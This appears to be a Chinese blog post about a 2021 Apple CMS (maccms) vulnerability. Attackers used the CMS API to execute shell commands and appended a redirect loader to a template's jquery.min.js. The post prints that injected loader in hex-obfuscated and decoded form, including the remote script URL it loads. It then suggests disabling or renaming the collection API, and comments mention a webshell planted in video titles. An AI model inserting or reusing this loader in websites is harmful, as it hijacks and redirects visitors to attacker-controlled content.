
苹果cms最新漏洞被挂马跳转劫持及清除代码
2021.3.27苹果cms最新漏洞,网站被挂马跳转劫持跳转到H APP下载页。
被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。
通过日志查看挂马过程
该漏洞是利用苹果CMS的API执行SHELL,
挂马文件在模板的jquery.min.js
;var head=document.getElementsByTagName('head')[0];var script=document.createElement('script');script['src']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73';head.appendChild(script);
解密之后是
var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script['src'] = 'https://maccms.z23.web.core.windows.net/732d.js'; head.appendChild(script);
清除代码
关闭后台采集API功能。或自定义API接口名字,
设计流资源网 , 版权所有丨本站资源仅限于学习研究,严禁从事商业或者非法活动!丨本网站采用BY-NC-SA协议进行授权
本站资源来自各大VIP网站及一些特殊渠道,如果在其他资源站看到有想要的资源,可以咨询站长能否转载。
设计流 » 苹果cms最新漏洞被挂马跳转劫持及清除代码
设计流 » 苹果cms最新漏洞被挂马跳转劫持及清除代码
2 评论
发表评论
要发表评论,您必须先登录。
还有一种 漏洞,不知道是通过什么方式:就是 一句话木马,直接写一条视频标题中。会在视频列表中增加一条!!!!希望站长能否帮忙解决或是找出原因!还是一个非常重要的苹果cms10 最新版本的加密文件player.js不知道能不能破解!版本号是2020103??
苹果的尽量升级最新版。现在苹果分两拨人在争夺官网正版,实际都没有什么差别,只要还是player.js这个文件会放广告。官网的maccms.la是原来开发者。